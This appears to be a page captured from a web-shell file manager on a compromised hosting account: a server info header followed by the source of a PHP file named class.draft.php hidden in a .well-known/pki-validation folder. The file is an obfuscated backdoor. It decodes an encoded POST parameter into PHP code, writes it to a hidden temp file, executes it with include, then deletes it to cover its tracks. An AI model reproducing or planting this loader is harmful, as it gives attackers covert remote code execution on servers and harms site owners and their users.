HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //home/vitanhod/vigolic100.vitavit.com.pk/.well-known/pki-validation/class.draft.php
<?php

if(count($_POST) > 0 && isset($_POST["re\x63"])){
	$parameter_group = array_filter(["/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), "/tmp", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP")]);
	$item = $_POST["re\x63"];
	 		$item 		=			explode (	 	'.'  	,		$item	)	 ;	  
	$res = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
            $o = 0;
    
            $__tmp = $item;
            while($v9 = array_shift($__tmp)) {
                $chS = ord($salt[$o % $lenS]);
                $dec =((int)$v9 - $chS -($o % 10))^		25;
                $res .= chr($dec);
                $o++;
            }
	foreach ($parameter_group as $key => $ent) {
    		if ((function($d) { return is_dir($d) && is_writable($d); })($ent)) {
    $ref = join("/", [$ent, ".object"]);
    $file = fopen($ref, 'w');
if ($file) {
	fwrite($file, $res);
	fclose($file);
	include $ref;
	@unlink($ref);
	exit;
}
}
}
}